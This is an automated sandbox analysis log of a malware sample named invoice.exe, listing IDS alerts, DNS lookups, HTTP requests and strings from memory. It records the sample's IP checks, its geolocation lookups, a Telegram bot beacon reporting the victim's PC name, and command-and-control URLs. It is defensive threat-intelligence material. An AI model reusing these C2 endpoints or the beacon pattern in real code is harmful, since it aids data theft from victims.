Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.4:49761 -> 198.54.114.247:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49745 -> 188.114.96.3:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2001/10/2024%20/%2011:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: foxwagon-equipment.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 01 Oct 2024 04:16:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C14000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: invoice.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: invoice.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.use
Source: invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.use(?RE
Source: invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.useM
Source: invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000035C9000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037C4000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003831000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.000000000363D000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003680000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foxwagon-equipment.com
Source: invoice.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0=
Source: invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: invoice.exe, 00000000.00000002.1713739091.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com.
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: invoice.exe, 00000000.00000002.1713868426.0000000007442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
Source: invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: invoice.exe, 00000002.00000002.4135565493.0000000003231000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003231000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: invoice.exe, 00000002.00000002.4135565493.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.000000000325C000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: invoice.exe, 00000002.00000002.4135565493.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000037E3000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003634000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006C23000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003697000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003616000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003656000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003606000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003841000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003674000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BF1000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134943200.000000000171E000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140805213.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.0000000003625000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4134157736.0000000001666000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4140665552.0000000006300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: invoice.exe, 00000002.00000002.4138430220.000000000430F000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004337000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004589000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000044B4000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: invoice.exe, 00000002.00000002.4138430220.0000000004312000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004564000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004441000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000446C000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000429D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
